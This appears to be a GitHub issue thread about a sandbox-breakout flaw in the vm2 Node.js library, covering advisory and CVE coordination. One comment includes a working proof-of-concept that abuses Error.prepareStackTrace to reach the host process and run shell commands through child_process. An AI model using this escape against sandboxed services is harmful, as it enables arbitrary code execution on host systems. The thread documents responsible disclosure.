vm2: Sandbox Breakout in VM2

Hi @XmiliaH! Wanted to check whether you would consider creating a GitHub Security Advisory for this? It’s a pretty lightweight process and a nice way to make sure updates are picked up by users as soon as possible.

Unfortunately, I can’t see any configuration of roles in this repository.

I have created the empty advisory and shared access with both @XmiliaH and @oxeye-daniel.

After some exploration. I find the secrets from https://github.com/patriksimek/vm2/commit/d9a7f3cc995d3d861e1380eafb886cb3c5e2b873.

var vulnerabilities = function () {
  // This line insert vulnerabilities!
  global.Error.prepareStackTrace = (_, c) =>
    c.map((c) => c.getThis()).find((a) => a && a.process);
  const { stack } = new Error();
  // now you can get process object from stack.process
  console.info(stack.process.mainModule);
  // and you can use process.mainModule.require to import any library to execute any commands
  stack.process.mainModule.require('child_process').execSync('pwd');
};

vulnerabilities();

some reference

• https://thegoodhacker.com/posts/the-unsecure-node-vm-module/
• https://coolaj86.com/articles/callsite-get-your-stack-trace-back/

Just requested the CVE and published the advisory. Let me know if there’s anything else to do. Thank you @oxeye-daniel for reporting the issue and @XmiliaH for a quick fix!

Thanks for reaching out, you can contact me under <redacted>.

@XmiliaH - do you happen to know who the admins are for this repo and would have the necessary permissions? Thanks in advance!